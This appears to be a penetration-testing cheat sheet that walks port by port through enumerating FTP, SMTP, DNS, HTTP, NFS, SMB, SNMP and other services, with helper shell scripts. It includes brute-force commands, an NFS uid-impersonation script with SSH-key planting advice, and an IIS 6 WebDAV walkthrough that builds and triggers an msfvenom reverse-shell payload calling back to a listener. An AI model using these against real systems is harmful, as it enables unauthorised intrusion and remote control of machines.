The-Process

Below is the process to follow, port by port, depending on what turns up during a pentest.

Before assuming that a port is only listening for one service, use amap to check whether multiple services (or protocol layers) answer on the same port.

amap 192.168.254.15 12380

Protocol on 192.168.254.15:12380/tcp matches http
Protocol on 192.168.254.15:12380/tcp matches http-apache2
Protocol on 192.168.254.15:12380/tcp matches ntp
Protocol on 192.168.254.15:12380/tcp matches ssl

As we can see, port 12380 answers as HTTP (Apache), NTP and SSL; we would not have known this otherwise. amap matches on response patterns, so treat extra matches as leads rather than facts: an NTP match on a port that speaks HTTP is probably a false positive, while the ssl match is worth confirming with openssl s_client -connect 192.168.254.15:12380.
=================================================
TCP Port 21 - FTP
nmap -sV -sC 10.11.1.8 -p 21
Banner grab - (nmap -v -p 21 -sV x.x.x.x --script=banner)

Try logging in anonymously (user anonymous, empty password - just hit Enter):
lftp anonymous@IP

nmap --script=ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-anon,ftp-libopie,ftp-vuln-cve2010-4221 -p 21 -n -v -sV -Pn 192.168.1.10
(tftp-enum belongs to UDP 69, not TCP 21; run it separately with -sU -p 69.)
=================================================

TCP Port 22 - SSH
Old servers may only offer key exchange methods your client has disabled ("no matching key exchange method found. Their offer: ..."). Pass the one they offer with -oKexAlgorithms (prefix with + to add it to the defaults rather than replace them):

e.g.
ssh -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 user@192.168.1.10

nmap -p 22 -n -v -sV -Pn --script ssh-auth-methods --script-args ssh.user=root 192.168.1.10
nmap -p 22 -n -v -sV -Pn --script ssh-hostkey 192.168.1.10 
nmap -p 22 -n -v -sV -Pn --script ssh-brute --script-args userdb=user_list.txt,passdb=password_list.txt 192.168.1.10 

=================================================

TCP Port 23
=================================================
TCP Port 25 - SMTP
SMTP user enumeration

Check for username enumeration (VRFY first; if it is disallowed try -M EXPN or -M RCPT):

smtp-user-enum -M VRFY -U /usr/share/wordlists/SecLists/Usernames/Names/names.txt -t 10.11.1.229

Test by hand whether VRFY is allowed (below it is not, so fall back to EXPN or RCPT TO):

telnet 10.11.1.229 25
Trying 10.11.1.229...
Connected to 10.11.1.229.
Escape character is '^]'.
220 MAIL ESMTP
HELO
501 HELO Invalid domain address.
HELO x
250 Hello.
VRFY root
502 VRFY disallowed.
VRFY blah
502 VRFY disallowed.
HELP
211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY

=================================================
TCP Port 53 - DNS related testing (when TCP 53 is open it is usually there to serve zone transfers)

Normal lookups go over UDP 53; TCP 53 is used for zone transfers (AXFR) and for answers too big for UDP, so an open TCP 53 is worth a transfer attempt.

nslookup
> server IP        - point nslookup at the target's name server first
> 127.0.0.1        - reverse lookup of localhost: often leaks the box's hostname/domain
> IP               - reverse lookup of the box you are testing
> test.com         - any hostname that seems logical for the box

Reverse sweeps with dnsrecon (-n is the name server to ask, -r the range to resolve; IP is the box you are testing):
dnsrecon -r 127.0.0.0/24 -n IP

also try..
dnsrecon -r 127.0.1.0/24 -n IP

next try the entire /24 (widen to /16 or /8 as needed):
dnsrecon -r 192.168.1.0/24 -n 192.168.1.1

Then try a zone transfer with dig, naming the DNS server with @ (192.168.1.2 below). dig needs the zone name: without it (dig axfr @192.168.1.2) it asks for the root zone and you get nothing useful, so use a domain found via the reverse lookups above:
dig axfr test.com @192.168.1.2

OR
dig axfr @192.168.1.2 test.com
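The AXFR-then-reverse-sweep sequence above, as an added example (not from the original page): it attempts the zone transfer and, if nothing comes back, sweeps PTR records for the /24 the way dnsrecon -r does. It assumes dig and seq are installed and that the domain, name server and /24 prefix are given as arguments.

```bash
#!/bin/sh
# Added example (not from the original page): try a zone transfer against a
# name server and, if it is refused, fall back to a reverse (PTR) sweep like
# dnsrecon -r. Assumes dig and seq are installed; domain, server and the /24
# prefix are arguments supplied by the tester.

# Reverse an IPv4 address into its in-addr.arpa name (what dig -x asks for).
in_addr_arpa() {
    printf '%s\n' "$1" | awk -F. '{ print $4 "." $3 "." $2 "." $1 ".in-addr.arpa" }'
}

# Reduce dig output on stdin to "name<TAB>rdata" for A and PTR records.
# dig prints one record per line: name ttl IN type rdata
dns_records() {
    awk '$3 == "IN" && ($4 == "A" || $4 == "PTR") {
             sub(/\.$/, "", $1); sub(/\.$/, "", $5); print $1 "\t" $5 }'
}

# AXFR the zone; returns 1 (and prints nothing) when the transfer is refused.
zone_transfer() {  # domain server
    local recs
    recs=$(dig +time=5 +tries=1 axfr "$1" "@$2" | dns_records)
    [ -n "$recs" ] || return 1
    printf '%s\n' "$recs"
}

# Query PTR for every host in a /24 and print "ip<TAB>name" for the ones that answer.
reverse_sweep() {  # prefix (e.g. 192.168.1) server
    local i name
    for i in $(seq 1 254); do
        for name in $(dig +short +time=2 +tries=1 -x "$1.$i" "@$2"); do
            printf '%s\t%s\n' "$1.$i" "${name%.}"
        done
    done
}

dns_enum() {  # domain server prefix
    if zone_transfer "$1" "$2"; then
        echo "# zone transfer of $1 succeeded" >&2
    else
        echo "# AXFR refused, sweeping PTR records in $3.0/24" >&2
        reverse_sweep "$3" "$2"
    fi
}

# Usage: ./dns_enum.sh test.com 192.168.1.2 192.168.1
if [ $# -ge 3 ]; then
    dns_enum "$@"
fi
```

Names recovered this way go straight into the hosts file (see the HTTP section) so that name-based virtual hosts can be checked.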

==================================================
TCP Port 79 - FINGER (which users exist and are, or recently were, logged in to the system)

1) Download finger-user-enum.pl
wget https://raw.githubusercontent.com/pentestmonkey/finger-user-enum/master/finger-user-enum.pl

1.1) perl finger-user-enum.pl -U /usr/share/wordlists/SecLists/Usernames/Names/names.txt -t 10.10.10.76 | less -S

Getting the results can take AGES, be patient.
While waiting you can run several instances in parallel: create a user.txt with names that look relevant from other enumeration and run it against that as well.

1.2) In the results look for "pts/2" or "pts/3" (the terminal they logged into), plus the login time and source address. Entries like that confirm the name exists and that the user is either logged in now or was recently.

==================================================
TCP Port 80 (or any HTTP listening service)
nmap -sC -sV -A -p 80 ip
Nikto (nikto -h http://ip)
dirbuster first as it seems to give better performance
dirsearch - test with "-f" (force extensions): it appends every extension to every word, so paths that come back as a 302 for /admin come back 200 as /admin.php - try it!

If every response returns '200 OK' (a catch-all page) switch to wfuzz and filter on size or word count. Go to the Wfuzz page:
https://sql--injection.blogspot.com/p/wfuzz.html

if there is a /cgi-bin/ folder then search for .sh .py .cgi files!

Add a logical name into the 'hosts' file and re-check the site (name-based vhosts may serve different content).
Check for WebDAV - nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229
If it's there run davtest - davtest -url http://10.11.1.229
then cadaver - cadaver http://10.11.1.229

if the site has extensions like (.php) then add the extension option in dirsearch "-e php" or dirb "-X .php"

Test for the HTTP PUT method - curl -X OPTIONS http://IP:PORT -v (look at the Allow: header; some servers accept PUT without advertising it, so try one anyway)

If PUT is available..
Upload a file (the URL must name the file to create; --data-binary keeps the body intact, whereas -d strips newlines):
curl -i -X PUT --data-binary @/directory/to/file http://IP:PORT/test.txt
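The PUT check above as an added example (not from the original page): it reads the Allow: header from OPTIONS, PUTs a small marker file, confirms it is served back with GET and deletes it again so nothing is left on the target. It assumes curl is installed and takes the base URL as its argument; the marker file name is made up for the test.

```bash
#!/bin/sh
# Added example (not from the original page): check which methods the server
# advertises, try a harmless PUT, confirm it with GET and remove it again.
# Assumes curl is installed and the base URL is passed as the first argument.
# The marker file name is constructed for the test and deleted afterwards.

# Print the methods listed in an Allow: header read from stdin, one per line.
parse_allow() {
    awk 'tolower($1) == "allow:" { sub(/^[^:]*:[ \t]*/, ""); sub(/\r$/, ""); print }' \
        | tr ',' '\n' | tr -d ' \t' | grep -v '^$'
}

# Exit 0 if the given method appears in the Allow: header on stdin (case-insensitive).
method_allowed() {  # method
    parse_allow | grep -qix "$1"
}

http_put_test() {  # base-url
    local base=${1%/} marker code url
    marker="put-check-$$"
    url="$base/$marker.txt"
    if curl -s -o /dev/null -D - -X OPTIONS "$base/" | method_allowed PUT; then
        echo "OPTIONS advertises PUT"
    else
        echo "PUT not advertised by OPTIONS, trying it anyway"
    fi
    # --data-binary keeps the body byte-for-byte; -d would strip newlines.
    code=$(curl -s -o /dev/null -w '%{http_code}' -X PUT --data-binary "$marker" "$url")
    case "$code" in
        20[0-4]) ;;
        *) echo "PUT rejected ($code)"; return 1 ;;
    esac
    if curl -s "$url" | grep -q "$marker"; then
        echo "PUT works, file readable at $url"
        curl -s -o /dev/null -X DELETE "$url"   # clean up the marker
    else
        echo "PUT returned $code but the file did not come back on GET"
        return 1
    fi
}

# Usage: ./put_test.sh http://10.11.1.229:80
if [ $# -ge 1 ]; then
    http_put_test "$1"
fi
```

A 201 or 204 on PUT followed by a readable GET is the real confirmation; the Allow: header alone is only a hint, in both directions.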
Read the source code --> Any comments? --> Any hint of a WordPress or Joomla site?

If Joomla - run joomscan
If WordPress - wpscan --> Goto WordPress section

If a page is included without an extension (e.g. http://test/index, so the app appends .php itself) then try the PHP filter wrapper to read the source instead of executing it:
php://filter/convert.base64-encode/resource=index

Got a login portal? Goto WEB LOGIN

=================================================
TCP Port 110 - POP3 - list the mailbox with LIST, read a message with RETR
#Try to brute force pop3 logins
nmap -sV --script=pop3-brute 10.10.10.51

Example
110/tcp open  pop3    JAMES pop3d 2.3.2
| pop3-brute:
|   Accounts: No valid accounts found
|   Statistics: Performed 19457 guesses in 404 seconds, average tps: 47.2

|_  ERROR: Failed to connect.

root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS john
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.

=================================================
TCP Port 111 - RPCBind / NFS
apt install nfs-common

  1. rpcinfo -p 192.168.1.98 | grep nfs      (is NFS registered with the portmapper?)
  2. showmount -e 192.168.1.98              (list the exports and who may mount them)
  3. If we get an output like..
     Export list for 192.168.1.98:
     /home/vulnix *
     the * means any client IP is allowed to mount it.
  4. mkdir -p /mnt/whatever && mount -t nfs -o nolock 192.168.1.98:/home/vulnix /mnt/whatever
  5. If listing the mount gives "Permission denied", the export is root-squashed: the server maps our uid 0 to nobody, but any other uid is trusted as-is. Check the owner with ls -ln /mnt/whatever, create a local user with that uid (useradd -u UID tmpuser) and read the share as that user.
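The whole NFS procedure above as an added example (not from the original page): it picks out the exports that are open to any client, mounts each one and, when root_squash gets in the way, reads the share as a local user whose uid matches the export's owner. It assumes nfs-common (showmount, mount.nfs), GNU stat, getent and useradd are available, that the script runs as root on the attack box, and that the server and a base mount directory are given as arguments.

```bash
#!/bin/sh
# Added example (not from the original page): find exports open to everyone,
# mount them, and when root_squash turns us into "nobody", read the share as a
# local user whose uid matches the export's owner. Assumes nfs-common, GNU
# stat, getent and useradd; must run as root on the attack box.

# Exports that showmount -e output (stdin) marks as allowed for "*" (any client).
nfs_open_exports() {
    awk 'NR > 1 && $2 == "*" { print $1 }'
}

# Name for the throwaway local account that impersonates a remote uid.
nfs_local_user() {  # uid
    printf 'nfsuid%s\n' "$1"
}

nfs_access() {  # server export mountpoint
    local srv=$1 exp=$2 mnt=$3 uid user
    mkdir -p "$mnt"
    # nolock avoids needing rpc.statd; vers=3 is what older targets usually speak
    mount -t nfs -o nolock,vers=3 "$srv:$exp" "$mnt" || return 1
    uid=$(stat -c %u "$mnt")          # numeric owner of the export root
    if [ "$uid" = 0 ]; then
        # Owned by root: either no_root_squash (we are root there) or we are nobody.
        ls -la "$mnt" && return 0
        echo "owned by root but listing denied: root_squash is in effect" >&2
        return 1
    fi
    # root_squash only maps uid 0; other uids are trusted, so become the owner.
    user=$(getent passwd "$uid" | cut -d: -f1)
    if [ -z "$user" ]; then
        user=$(nfs_local_user "$uid")
        useradd -M -u "$uid" -s /bin/sh "$user"
    fi
    su -s /bin/sh "$user" -c "ls -la '$mnt'; cat '$mnt/.ssh/authorized_keys' 2>/dev/null"
}

nfs_enum() {  # server mountpoint-base
    local e n=0
    showmount -e "$1" | nfs_open_exports | while IFS= read -r e; do
        n=$((n + 1))
        echo "# $e is exported to *"
        nfs_access "$1" "$e" "$2/$n"
    done
}

# Usage: ./nfs_enum.sh 192.168.1.98 /mnt/nfs
if [ $# -ge 2 ]; then
    nfs_enum "$@"
fi
```

The same uid trick works in the other direction: if the export is writable as that user, dropping a public key into .ssh/authorized_keys on the share gives SSH access as the owner, which is the usual follow-up on a home-directory export.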
=================================================
TCP Port 135 - Remote Procedure Call (MSRPC endpoint mapper)
Usually seen alongside 139/445 on Windows; run the SMB/RPC enumeration listed under TCP Port 445 below (nmap smb-* scripts, enum4linux, rpcclient, smbclient).
nbtstat -a IP (Windows) or nmblookup -A IP (Linux) for the NetBIOS name table.



UDP Port 137 - NetBIOS name service

TCP Port 139 - NetBIOS session (SMB over NetBIOS): same checks as TCP Port 445

UDP Port 161 - SNMP

nmap -n -vv -sV -sU -Pn -p 161,162 --script=snmp-processes,snmp-netstat 192.168.1.10
onesixtyone -c communities.txt 192.168.1.10
snmp-check -t 192.168.1.10 -c public
snmpwalk -c public -v 1 192.168.1.10 [MIB_TREE_VALUE]
hydra -P passwords.txt -v 192.168.1.10 snmp

#Communities.txt
public
private
community

#SNMP MIB Trees
1.3.6.1.2.1.25.1.6.0    System Processes (count, hrSystemProcesses)
1.3.6.1.2.1.25.4.2.1.2  Running Programs (hrSWRunName)
1.3.6.1.2.1.25.4.2.1.4  Process Path (hrSWRunPath)
1.3.6.1.2.1.25.2.3.1.4  Storage Units (hrStorageAllocationUnits)
1.3.6.1.2.1.25.6.3.1.2  Installed Software Name (hrSWInstalledName)
1.3.6.1.4.1.77.1.2.25   User Accounts (Windows LanManager MIB)
1.3.6.1.2.1.6.13.1.3    TCP Local Ports (tcpConnLocalPort)
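The community check and the process-table walk above, as an added example (not from the original page): it finds the first community string that answers a GET of sysDescr.0, walks the host-resources process table and joins the hrSWRunName and hrSWRunPath columns by process index, which is what you want when hunting for credentials in command lines and odd binaries. It assumes net-snmp (snmpget/snmpwalk) is installed and uses a small constructed community list.

```bash
#!/bin/sh
# Added example (not from the original page): find a community string that
# answers, then walk the host-resources process table and join the name and
# path columns by process index. Assumes net-snmp (snmpget/snmpwalk) is
# installed; the community list below is a small constructed one.

COMMUNITIES="public private community manager"   # assumed wordlist

# First community for which a GET of sysDescr.0 succeeds; exit 1 if none.
snmp_community() {  # host
    local c
    for c in $COMMUNITIES; do
        if snmpget -v1 -c "$c" -t 1 -r 0 "$1" 1.3.6.1.2.1.1.1.0 >/dev/null 2>&1; then
            echo "$c"
            return 0
        fi
    done
    return 1
}

# Join snmpwalk -On output (stdin) for hrSWRunName (...25.4.2.1.2.<pid>) and
# hrSWRunPath (...25.4.2.1.4.<pid>) into "pid name path", sorted by pid.
snmp_processes() {
    awk -F' = ' '
        {
            oid = $1; val = $2
            sub(/^[A-Za-z-]+: */, "", val)   # drop the "STRING: " type prefix
            gsub(/"/, "", val)
            n = split(oid, p, "."); idx = p[n]
            if (oid ~ /\.25\.4\.2\.1\.2\.[0-9]+$/) name[idx] = val
            else if (oid ~ /\.25\.4\.2\.1\.4\.[0-9]+$/) path[idx] = val
        }
        END { for (i in name) print i, name[i], path[i] }
    ' | sort -n
}

snmp_enum() {  # host
    local c
    c=$(snmp_community "$1") || { echo "no community answered" >&2; return 1; }
    echo "# community: $c" >&2
    snmpwalk -v1 -On -c "$c" "$1" 1.3.6.1.2.1.25.4.2.1 | snmp_processes
}

# Usage: ./snmp_enum.sh 192.168.1.10
if [ $# -ge 1 ]; then
    snmp_enum "$1"
fi
```

Walk 1.3.6.1.2.1.25.4.2.1.5 (hrSWRunParameters) the same way to get the command-line arguments; passwords passed on the command line show up there.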
UDP Port 162 - SNMP traps

TCP Port 443 - HTTPS (run the TCP Port 80 checks as well)

sslscan 192.168.1.10:443
 
TCP Port 445 - SMB
apt-get install smb4k -y
nmap -n -v -sV -Pn -p 445 --script=smb-ls,smb-mbenum,smb-enum-shares,smb-enum-users,smb-os-discovery,smb-security-mode,smbv2-enabled,smb-vuln* 192.168.1.10
enum4linux -a 192.168.1.10
rpcclient -U "" -N 192.168.1.10     (null session; -N skips the password prompt)
 >srvinfo
 >enumdomusers
 >getdompwinfo
smbclient -L 192.168.1.10 -N
smbclient //192.168.1.10/ipc$ -U administrator     (the Windows form \\192.168.1.10\ipc$ needs the backslashes quoted in a Unix shell, so use the // form)
smbclient //192.168.1.10/admin$ -U administrator
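The share listing and null-session checks above, as an added example (not from the original page): it parses the share table printed by smbclient -L and then tries an unauthenticated directory listing on every share, so you see at a glance which ones are readable without credentials. It assumes smbclient from Samba is installed and takes the host as its argument.

```bash
#!/bin/sh
# Added example (not from the original page): list shares as a null session
# and test which ones can actually be read without credentials. Assumes
# smbclient (samba) is installed; host is the first argument.

# Share names from the "Sharename / Type / Comment" table in smbclient -L output (stdin).
smb_shares() {
    awk '/^[ \t]*Sharename[ \t]+Type/     { in_tbl = 1; next }
         in_tbl && /^[ \t]*---/          { next }
         in_tbl && (NF == 0 || !/^[ \t]/) { in_tbl = 0 }
         in_tbl                          { print $1 }'
}

# Try a directory listing on one share with no password; 0 on success.
smb_can_read() {  # host share
    smbclient "//$1/$2" -N -c 'ls' >/dev/null 2>&1
}

smb_null_enum() {  # host
    local s
    smbclient -L "//$1" -N 2>/dev/null | smb_shares | while IFS= read -r s; do
        if smb_can_read "$1" "$s"; then
            printf '%s\tREADABLE (null session)\n' "$s"
        else
            printf '%s\tdenied\n' "$s"
        fi
    done
}

# Usage: ./smb_null.sh 192.168.1.10
if [ $# -ge 1 ]; then
    smb_null_enum "$1"
fi
```

IPC$ normally reports "denied" for a directory listing even when the null session itself works, so judge null-session support by rpcclient -U "" -N rather than by this check.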

TCP Ports 512,513,514
apt-get install rsh-client

#Try to login with the root user or a user found already.
rlogin -l root 192.168.1.98

#If not, brute force it - output is slow but will come.
nmap -p 513 --script rlogin-brute 192.168.1.98 -v 




TCP Port 3306

nmap -n -v -sV -Pn -p 3306 --script=mysql-info,mysql-audit,mysql-enum,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-users,mysql-query,mysql-variables,mysql-vuln-cve2012-2122 192.168.1.10
mysql --host=192.168.1.10 -u root -p 
 
TCP Port 3389

ncrack -vv --user administrator -P passwords.txt rdp://192.168.1.10,CL=1
rdesktop 192.168.1.10


IIS 6.0 / Server 2003 ASP file upload via WebDAV
Create the payload, rename it to .txt (IIS 6 refuses to PUT .asp directly), upload it, then COPY it to a name ending in .asp;.txt - IIS 6 stops parsing the filename at the semicolon and executes it as ASP:
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.108 LPORT=4444 -f asp --arch x86 --platform windows > shell_reverse_tcp.asp
cp shell_reverse_tcp.asp shell_reverse_tcp.txt
cadaver http://IP/

dav:/> put shell_reverse_tcp.txt
Uploading shell_reverse_tcp.txt to `/shell_reverse_tcp.txt':
Progress: [=============================>] 100.0% of 38349 bytes succeeded.
dav:/> copy shell_reverse_tcp.txt shell_reverse_tcp.asp;.txt
Copying `/shell_reverse_tcp.txt' to `/shell_reverse_tcp.asp%3b.txt':  succeeded.
dav:/>

Start a listener on the LPORT used above (nc -lvnp 4444) and browse to http://IP/shell_reverse_tcp.asp;.txt to trigger it.



Image Files

exiftool -a -u -g1 FILENAME
binwalk -ME FILENAME





Opening Database Files
-SDF files can be opened with SQL Query Compact Analyser;
-MDF files can be opened with SQL MDF Viewer

LFI
found an LFI? or want to test for LFI use lfisuite
